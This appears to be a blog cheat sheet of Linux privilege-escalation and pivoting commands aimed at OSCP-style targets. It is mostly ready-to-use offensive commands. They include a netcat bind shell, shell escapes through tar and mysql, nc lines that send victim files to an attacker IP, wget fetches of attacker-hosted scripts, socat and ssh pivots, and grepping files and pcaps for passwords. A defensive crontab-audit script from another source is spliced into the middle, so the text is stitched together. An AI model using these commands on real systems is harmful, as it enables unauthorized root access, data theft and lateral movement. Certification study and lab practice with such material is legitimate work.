Hello everyone, below is the privilege escalation cheat sheet that I used to pass my OSCP certification. It mixes lots of commands for enumerating many different situations. A few commands might not work on every Linux distribution. Feel free to comment below if I missed any useful commands. If you are looking for the Linux Privilege Escalation Techniques here you go --> Linux Privilege Escalation Techniques, and here are the Windows Privilege Escalation commands and techniques.
Simple Linux Priv Esc Checklist
1. sudo -l
2. sudo su
3. uname -a / cat /proc/version --> check the kernel version for known vulnerabilities
4. Check for files with root privileges (SUID)
5. Check for cron jobs
6. /etc/passwd file --> writable?
7. PATH exploit
8. Check for processes running as root
9. Run pspy to check running processes & cron jobs
10. Check .bash_history
11. ls -la the home directory
12. Check the /opt/, /var/www/html, /home/, /root and / directories thoroughly
13. Check for world-readable files
14. Check if mysql is running as root
15. "mount" command to check the permissions on mounted folders
16. Run "pspy -f" on the target and check all running file system tasks
17. Check file/folder permissions: even if you don't own the file, the folder might be owned by you, in which case you can add/delete files and filenames.
Ex: the file runs as root but the folder owner is you; delete the file and create a new file with the same name, and you can get root access.
THIS IS MERELY CREATED FOR EDUCATIONAL & ETHICAL PURPOSE ONLY, AUTHOR IS NOT RESPONSIBLE FOR ANY ILLEGAL ACTIVITIES DONE BY THE VISITORS
Linux Privilege Escalation Cheatsheet
sudo -l --> check which commands and directories you may run with root privileges
sudo bash --> get a root shell
sudo id --> check privilege level
Operating System Details:
uname -a
cat /proc/version
ps aux | grep root --> check for applications running as root
ps -ef
dpkg -l --> list all installed packages
python -c 'import pty;pty.spawn("/bin/bash")' --> spawn a pty shell; sometimes python3 works as well
Get Interactive Shell:
python -c 'import pty;pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo
fg
export TERM=xterm
Finding Files with Root Privileges (SUID):
find / -perm -4000 2>/dev/null | xargs ls -la
Finding World Writable Files (-perm -2 is the other-write bit):
find / -perm -2 ! -type l -ls 2>/dev/null
World Writable & Executable Directories:
find / \( -perm -o+w -a -perm -o+x \) -type d 2>/dev/null
World Executable Folders:
find / -perm -o+x -type d 2>/dev/null
Find SUID & SGID Binaries:
find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null # SGID or SUID (parentheses needed, otherwise -type f only applies to the SUID half)
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done
find / -perm -1000 -type d 2>/dev/null #Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null #SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null #SUID (chmod 4000) - run as the owner, not the user who started it.
List files that carry capabilities (a possible route to root privileges):
getcap -r / 2>/dev/null
Linux Capabilities - 40 Using Capabilities
#List all capabilities of the current process
#cap_sys_module is exploitable
capsh --print
Priv Esc using Sys_Module Capability in Docker
Find Services Running Behind Firewall/Localhost:
netstat -ano
netstat -tulpn
CRON Jobs
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
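For the cron enumeration above and the "PATH exploit" item in the checklist, an added check (not from the original post) that parses crontab lines and flags commands invoked by bare name while the crontab's PATH contains a directory writable by other users. The sample crontab lines, the function names and the /etc/crontab field layout are assumptions I constructed.

```shell
#!/bin/sh
# Added check, not from the original cheat sheet: audit crontab lines for the
# "PATH exploit" in the checklist. An entry that names its command without a
# slash is resolved through the crontab's PATH line; if a directory on that PATH
# is writable by other users, a look-alike binary dropped there runs as the
# entry's user (root for /etc/crontab). Assumes /etc/crontab layout and GNU find.

# writable_path_dirs PATHSPEC: prints each existing PATH element that is
# group/other writable (octal 020/002) and not sticky (1000).
writable_path_dirs() {
    echo "$1" | tr ':' '\n' | while IFS= read -r dir; do
        [ -d "$dir" ] || continue
        find -H "$dir" -maxdepth 0 -type d \( -perm -020 -o -perm -002 \) ! -perm -1000 2>/dev/null
    done
}

# audit_crontab < crontab: prints one RISK line per PATH-resolved command whose
# PATH holds a writable directory. Returns 1 if anything was flagged, else 0.
audit_crontab() {
    path=/usr/bin:/bin; rc=0   # cron's default PATH when the file sets none
    while IFS= read -r line; do
        case "$line" in
            ''|'#'*)      continue ;;
            PATH=*)       path=${line#PATH=}; path=${path#\"}; path=${path%\"}; continue ;;
            [A-Za-z_]*=*) continue ;;            # MAILTO=, HOME=, other variables
        esac
        set -f; set -- $line; set +f             # split fields, no glob expansion of '*'
        if [ "${1#@}" != "$1" ]; then            # @reboot / @daily shorthand
            user=$2; cmd=$3
        else
            [ $# -ge 7 ] || continue             # min hour dom mon dow user command
            user=$6; cmd=$7
        fi
        case "$cmd" in */*) continue ;; esac     # explicit path, not PATH-resolved
        bad=$(writable_path_dirs "$path" | tr '\n' ' ')
        if [ -n "$bad" ]; then
            echo "RISK: '$cmd' (runs as $user) resolves through writable dir(s): $bad"
            rc=1
        fi
    done
    return $rc
}

# Constructed sample crontab with a world-writable directory appended to PATH.
w=$(mktemp -d); chmod 777 "$w"
printf '%s\n' "PATH=/usr/local/sbin:/usr/bin:$w" \
    '*/5 * * * * root backup.sh --quiet' \
    '0 3 * * * root /usr/local/sbin/rotate-logs' | audit_crontab
echo "rc=$?"; rm -rf "$w"
```

On a real host feed it the system crontab (audit_crontab < /etc/crontab) and the files under /etc/cron.d; user crontabs have no user field and need the 6-field layout instead.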
find . -type f -ls --> list all files below the current directory
python -m SimpleHTTPServer 8080 --> start a web server on your own machine
wget http://yourip:8080/LinuxEnum.sh --> run this on the target machine to fetch the file
Send a File From Kali To Victim:
nc -nlvp 9001 < exploit.c --> serve the file from Kali
nc YourIpAddress 9001 > /tmp/exploit.c --> receive the file on the target machine
Get a File From Victim to Kali:
on Kali: nc -l -p 8001 > filefoldername
on victim: nc -w 5 10.10.14.14 8001 < /usr/local/bin/filename
When a command can only be run as a specific user: sudo -u UserName /bin/bash --> works when you see this in sudo -l
Port Scanning with netcat (when nmap is not available on the box):
for port in $(seq 1 65535); do nc -nvzw1 VICTIM_IP $port 2>&1; done | grep open
Dynamic Port Forwarding:
nano /etc/proxychains.conf # add the line below
socks5 127.0.0.1 1080
On the terminal: ssh -D 1080 root@10.10.10.10 # needs the password
proxychains netdiscover -r 10.10.10.10/24
Local Port Forwarding using ssh
ssh -L 1080:127.0.0.1:80 root@10.10.10.10
Remote Port Forwarding using SSH
ssh -R 1080:127.0.0.1:80 root@10.10.10.10
Port Forwarding using Netcat
nc -l -p $localport -c "nc $remotehost $remoteport"
netcat -nvlp 9001 # listen on port 9001
netcat -l -p 9001 -e /bin/bash # bind a bash shell to port 9001
netcat -L KALI_IP:80 -p 9002 # forward local port 9002 to remote port 80
netcat -L KALI_IP:80 -p 9002 -x # port forward with hex dump
Port Forwarding using mknod
mknod can be used to create special files, including FIFOs (named pipes)
mknod backpipe p # p = create a named pipe
nc -l -p Allowed_Inbound_port 0<backpipe | nc 127.0.0.1 22 1>backpipe
1 = standard output
0 = standard input
Netcat Relay to Forward SSH on our Linux machine, with scenario:
You are on a Windows box, trying to connect to a Linux machine whose SSH port (22) is blocked for inbound traffic.
We have a shell on the Linux machine but not SSH, so we are trying to get into SSH.
So, find some port which is open on the Linux machine and use nc to communicate through it, e.g. 4444.
On the Linux machine:
We need to relay traffic from port 22 to 4444 and access it from the Windows machine.
mknod /tmp/backpipe p
nc -l -p 4444 0</tmp/backpipe | nc localhost 22 1>/tmp/backpipe
Port Forwarding using socat:
Start socat listeners for Victim_machine2's ports 8009 & 8080 on the first compromised machine. From the Victim-1 machine, do a port scan as above and forward the required ports, binding the Victim-2 ports to the Victim-1 machine so that we can reach them from our Kali machine:
socat tcp-listen:8009,fork tcp:VICTIM2_IP:8009 &
socat tcp-listen:8080,fork tcp:VICTIM2_IP:8080 &
netstat -plunt # view the bound ports; we can see 8009 & 8080 on Victim_machine1
Access the Victim-2 ports on our Kali machine; on the Victim-1 machine:
socat tcp-listen:4321,fork tcp:KALI_IP:4321 &
Compiling Exploit
gcc exploit.c -pthread -lcrypt -o Exploit --> Compile The Exploit
gcc -m32 -Wl,--hash-style=both 9542.c -o exploit --> Compiling 32-bit Exploit
./Exploit
Check for Unmounted Drives
cat /etc/fstab
cat .bash_history --> check the command history
echo os.system("/bin/bash") --> escaping a limited shell using ssh
df -h --> list the machine's partitions (mounted devices as well)
/dev/shm --> world-writable tmpfs; you can copy files into this location and run them when other locations are not writable
cat /dev/sdb --> might contain deleted data from the partition; try strings /dev/sdb to look for flags
find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null --> all root-owned SUID files and directories
Grep Recursively for a string
grep -iRI 'password' .
#Grep for a username/string
grep 'bhanu' /etc -R 2>/dev/null
tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/sh --> get a proper shell from a restricted shell
mysql -u root -p # log in to MySQL as root
\! ls -l # execute shell commands from the mysql prompt
Finding Passwords from a PCAP file using TCPDUMP:
tcpdump -nt -r capture.pcap -A 2>/dev/null | grep -P 'pwd='
If I missed something, feel free to comment below, and if you are looking for the Linux Privilege Escalation Techniques here you go --> Linux Privilege Escalation Techniques; here are the Windows Privilege Escalation commands and techniques.